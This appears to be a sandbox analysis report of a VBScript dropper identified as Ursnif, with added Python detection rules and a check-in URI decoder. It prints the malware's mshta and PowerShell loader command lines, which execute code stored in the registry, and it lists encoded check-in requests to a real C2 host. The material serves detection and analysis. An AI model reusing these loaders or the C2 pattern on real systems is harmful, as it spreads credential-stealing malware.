
Analysis Report my_presentation_96642.vbs

Overview

General Information

Sample Name:my_presentation_96642.vbs
Analysis ID:286676
MD5:2e44ef40fba0da489e9c15ff7c64692c
SHA1:2b28439329860c37a6f73e9560c717e4f3962a4f
SHA256:bfd79682733c250d046f4174c4b5eb8df75f1132d7e6ac2aa0b5c4ad95419ab6


Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Found Tor onion address
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 6884 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_96642.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 6052 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 1220 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6596 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:3740956 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4256 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75030 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5408 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75038 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 6868 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5940 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6804 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4108 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6584 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3672 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • control.exe (PID: 3596 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(5 of 12 entries shown)

            Sigma Overview

            System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5940, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', ProcessId: 6804
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6868, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5940
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5940, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline', ProcessId: 6804
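The three Sigma hits above, together with the process tree in the Startup section (mshta.exe reading an HTA body out of HKCU\Software\AppDataLow\..., spawning powershell.exe that reads the next stage from a registry value and passes it to iex, which in turn drives csc.exe on response files in %TEMP%), describe a chain that can be re-detected from plain process-creation telemetry. The following is an added example, not Joe Sandbox or Sigma project code: simplified rules that approximate the three detections (the two csc.exe rules are folded into one, and a fourth rule for the registry-resident PowerShell stage is added) evaluated over events constructed from the command lines shown in this report. PIDs, paths and command lines are taken from the report; the parent of mshta.exe is not shown in the tree (the report lists "Creates processes via WMI"), so it is recorded as unknown. The rule bodies and the user-writable folder list are this example's own assumptions, not the published rule text.

```python
"""Simplified process-creation rules approximating the Sigma hits in this report,
evaluated over events constructed from the process tree above.
Added example; not Joe Sandbox or Sigma project code."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int           # 0 when the report does not show the parent
    image: str          # full path of the new process
    cmdline: str
    parent_image: str   # full path of the parent ("" when not shown)


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


# Assumed lists; the published rules use their own (longer) sets.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                 "\\users\\public\\", "\\windows\\temp\\")
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
BUILD_TOOLS = {"devenv.exe", "msbuild.exe", "vbcscompiler.exe"}


def csc_from_user_writable(ev: ProcEvent) -> bool:
    """csc.exe handed a source/response file in a user-writable folder and not
    launched by an IDE or build tool; covers both csc.exe rules on the page."""
    if _name(ev.image) != "csc.exe" or _name(ev.parent_image) in BUILD_TOOLS:
        return False
    return any(d in ev.cmdline.lower() for d in USER_WRITABLE)


def mshta_spawning_shell(ev: ProcEvent) -> bool:
    """mshta.exe as the direct parent of a shell or script host."""
    return _name(ev.parent_image) == "mshta.exe" and _name(ev.image) in SHELLS


def powershell_registry_stage(ev: ProcEvent) -> bool:
    """PowerShell reading a registry value and feeding it to Invoke-Expression,
    the registry-resident loader pattern visible in the tree above."""
    if _name(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return False
    cl = ev.cmdline.lower()
    reads_registry = re.search(r"\b(gp|get-itemproperty)\b", cl) and ("hkcu:" in cl or "hklm:" in cl)
    executes = re.search(r"\b(iex|invoke-expression)\b", cl)
    return bool(reads_registry and executes)


RULES = {
    "csc_from_user_writable": csc_from_user_writable,
    "mshta_spawning_shell": mshta_spawning_shell,
    "powershell_registry_stage": powershell_registry_stage,
}


def evaluate(events):
    """Map pid -> names of the rules that fired on its creation event."""
    hits = {}
    for ev in events:
        fired = [name for name, rule in RULES.items() if rule(ev)]
        if fired:
            hits[ev.pid] = fired
    return hits


def ancestry(events, pid):
    """Image names from pid upwards until the parent is no longer in the event set."""
    by_pid = {ev.pid: ev for ev in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


# Constructed events, values copied from the report's process tree.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
PS_CMD = (" iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\\AppDataLow"
          "\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))")

EVENTS = [
    ProcEvent(6884, 0, WSCRIPT, WSCRIPT + r" C:\Users\user\Desktop\my_presentation_96642.vbs", ""),
    ProcEvent(6868, 0, MSHTA, MSHTA + " about:<hta:application>...", ""),  # HTA body abbreviated
    ProcEvent(5940, 6868, PS, PS + PS_CMD, MSHTA),
    ProcEvent(3612, 5940, r"C:\Windows\system32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", PS),
    ProcEvent(6804, 5940, CSC, CSC + r" /noconfig /fullpaths @C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline", PS),
    ProcEvent(6584, 5940, CSC, CSC + r" /noconfig /fullpaths @C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline", PS),
]

if __name__ == "__main__":
    for pid, fired in evaluate(EVENTS).items():
        print(pid, " <- ".join(ancestry(EVENTS, pid)), fired)
```

Against these events powershell.exe (5940) trips both the mshta-parent rule and the registry-stage rule, each csc.exe instance trips the compiler rule, and the ancestry of PID 6804 reads csc.exe, powershell.exe, mshta.exe; wscript.exe itself is silent, which is the point of correlating on the children rather than on the dropped script.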

            Signature Overview


AV Detection:

Multi AV Scanner detection for domain / URL
Source: api10.laptok.at | Virustotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: my_presentation_96642.vbs | Virustotal: Detection: 14%
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local

Networking:

Found Tor onion address
Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic | HTTP traffic detected:
  GET /api1/zeKdvS5_2Fn9oM_2F/coexB5hfv5Xq/BKUHttHYtNW/us6FE9_2B_2B06/DIA0XeFh6yzS1LY6s1oCH/O6I0fMOtxB_2FaMK/P_2FmFM_2F8ypR7/dx9hXoLcsTTkQCtqPt/jQT_2FP3D/Vu_2Br5n_2F72Y040sm_/2BshdGM4o4B1uUiNO_2/F9Br33BkXML4fx8yq9Jct6/kljeBXeVRXyBC/jH9YPFqS/oW_2BnptlSOO3fjce7eFLQs/cjY_2B3b6K/0jP5qluzKD5UfBlPH/Yyy63TkrNQlk/H6h_0A_0DaA/_2FxxiWhza0HQw/PJfj9KaKc_2Fqn7RK3nQF/t9F36pLVv5/WExF HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /api1/xTmMAvfM8U78kER_2F7EJnC/bkGInMvNpG/6BP8y1_2BixUNH8Ya/1_2BJ2jwUqv1/PwAIg5Ci1Fp/NLUjkZDJX0Lhz0/_2B3Sl0fwWX3wVqK9fb0z/7prGaa1jNih_2FOl/e3_2BA_2FKyguNE/6gpQxTR29SWNVBzUiX/ooUjtYHSM/WJ2P7LXY0oqriYCDuUO5/6JGdRDFUFc7agHutM4Y/a7EEiaV_2B0Drpu7We2Elq/RNdw4UnphUm43/8yKUJrxx/MzdqD4aHhzJD6hXinP_2B_2/F_0A_0D_2F/yCrsh4eR2L6X7FBWv/KfYirZe4p8lP/b6dEfEFP0Hl/t0eFrlqKA0UbT2/NIFmqja4/0WX_2BS HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6xGQ8EFIKznixG/GIj81mj5k3B7TX2D/fTUrCzDV3sDdRNL/bMPSf9FVeacVj6Vh6g/21pfsCJp2/EOpd_2B8C24lKh5Q2hDj/jl4XV9jmwt81YjEedHm/Tvg4EvsmItvP2bpxHHYerN/GLMMgTJoYNBZD/lWpad5rU/ln_2FWDRI9hu_2B3EPbvwjD/xVOTspfDX3/s2TnvfY8e1XD_0A_0/D9Osa1XJDU3_/2BhSFJPYg7H/ypXm94knvghV5F/1R2_2FzWrhbikgq4I9drg/0B61m_2Bo/Km_2FnHXX/v HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml1.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x21e87356,0x01d68cbc</date><accdate>0x21e87356,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x21e87356,0x01d68cbc</date><accdate>0x21e87356,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x21ed3819,0x01d68cbc</date><accdate>0x21ed3819,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x21ed3819,0x01d68cbc</date><accdate>0x21ed3819,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x21ef9a54,0x01d68cbc</date><accdate>0x21ef9a54,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x21ef9a54,0x01d68cbc</date><accdate>0x21ef9a54,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown | DNS traffic detected: queries for: api10.laptok.at
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Wed, 16 Sep 2020 21:30:41 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  Vary: Accept-Encoding
  Content-Encoding: gzip
  Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
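The three GET requests to api10.laptok.at above carry the URI shape that is characteristic of Ursnif check-ins: a fixed prefix, then base64-derived text with `/` and `+` escaped as `_2F` and `_2B`, an escaped line break `_0A_0D`, no padding, and extra `/` separators sprinkled through the string (note `_2B_2/F_0A_0D_2F` in the second request, where a separator lands inside a token). The decoder below is an added example, not Joe Sandbox or Ursnif code; its transform rules are assumptions drawn from public Ursnif/ISFB analyses rather than from this report. The decoded bytes are still ciphertext (Serpent-CBC per those analyses; the report recovered no configuration, so there is no key to go further), so the example stops at the raw bytes and uses 16-byte block alignment as a triage heuristic. `encode_ursnif_path` is a hypothetical mirror of the transform, used only to build round-trip test data; only the first request is embedded.

```python
"""Decoder for Ursnif-style check-in URIs, added example (not Joe Sandbox or
Ursnif code). Transform rules are assumptions from public ISFB analyses."""
import base64
import binascii
import random

# Path of the first GET request in this report (prefix /api1/ kept).
REPORT_REQUEST_PATH = (
    "/api1/zeKdvS5_2Fn9oM_2F/coexB5hfv5Xq/BKUHttHYtNW/us6FE9_2B_2B06/DIA0XeFh6yzS1LY6s1oCH/"
    "O6I0fMOtxB_2FaMK/P_2FmFM_2F8ypR7/dx9hXoLcsTTkQCtqPt/jQT_2FP3D/Vu_2Br5n_2F72Y040sm_/"
    "2BshdGM4o4B1uUiNO_2/F9Br33BkXML4fx8yq9Jct6/kljeBXeVRXyBC/jH9YPFqS/oW_2BnptlSOO3fjce7eFLQs/"
    "cjY_2B3b6K/0jP5qluzKD5UfBlPH/Yyy63TkrNQlk/H6h_0A_0DaA/_2FxxiWhza0HQw/PJfj9KaKc_2Fqn7RK3nQF/"
    "t9F36pLVv5/WExF"
)


def decode_ursnif_path(path: str, prefix: str = "/api1/") -> bytes:
    """Reverse the assumed URI transform and return the raw (still encrypted) bytes.

    Order matters: the literal '/' separators are inserted after escaping and may
    split a token, so they are removed before the '_2F'/'_2B'/'_0A_0D' tokens
    are interpreted. Padding is restored because the sample strips it.
    """
    if path.startswith(prefix):
        path = path[len(prefix):]
    s = path.replace("/", "")          # random path separators (assumption)
    s = s.replace("_0A_0D", "")        # escaped line break (assumption)
    s = s.replace("_2F", "/").replace("_2B", "+")
    s += "=" * (-len(s) % 4)
    return base64.b64decode(s, validate=True)   # raises on any stray character


def looks_like_ursnif_path(path: str, prefix: str = "/api1/",
                           block: int = 16, min_len: int = 32) -> bool:
    """Triage heuristic: decodes cleanly and is a whole number of cipher blocks."""
    try:
        ct = decode_ursnif_path(path, prefix)
    except binascii.Error:
        return False
    return len(ct) >= min_len and len(ct) % block == 0


def encode_ursnif_path(data: bytes, prefix: str = "/api1/", seed: int = 1) -> str:
    """Hypothetical forward transform (mirror of decode_ursnif_path) used only to
    build test input: base64 without padding, a line-break marker every 64
    characters, '/'->'_2F', '+'->'_2B', then '/' separators at random offsets."""
    b64 = base64.b64encode(data).decode().rstrip("=")
    wrapped = "_0A_0D".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    esc = wrapped.replace("/", "_2F").replace("+", "_2B")
    rng = random.Random(seed)
    chunks, i = [], 0
    while i < len(esc):
        n = rng.randint(8, 24)
        chunks.append(esc[i:i + n])
        i += n
    return prefix + "/".join(chunks)


# Constructed plaintext for the round trip: 224 bytes, the same size as the
# ciphertext recovered from the report's first request.
SAMPLE_PLAINTEXT = bytes(range(224))

if __name__ == "__main__":
    ct = decode_ursnif_path(REPORT_REQUEST_PATH)
    print(len(ct), "bytes,", len(ct) // 16, "x 16-byte blocks")
    print("favicon looks like Ursnif:", looks_like_ursnif_path("/favicon.ico"))
```

On the first request above the decoder yields 224 bytes, exactly 14 blocks of 16, which is what a CBC-encrypted blob with stripped base64 padding should look like; the /favicon.ico requests that follow each check-in fail the alphabet check and are rejected. The heuristic is deliberately loose (any base64 path with block-aligned length passes), so in practice it belongs behind a hostname or ASN filter rather than on its own.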
Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmp | String found in binary or memory: http://%s.com
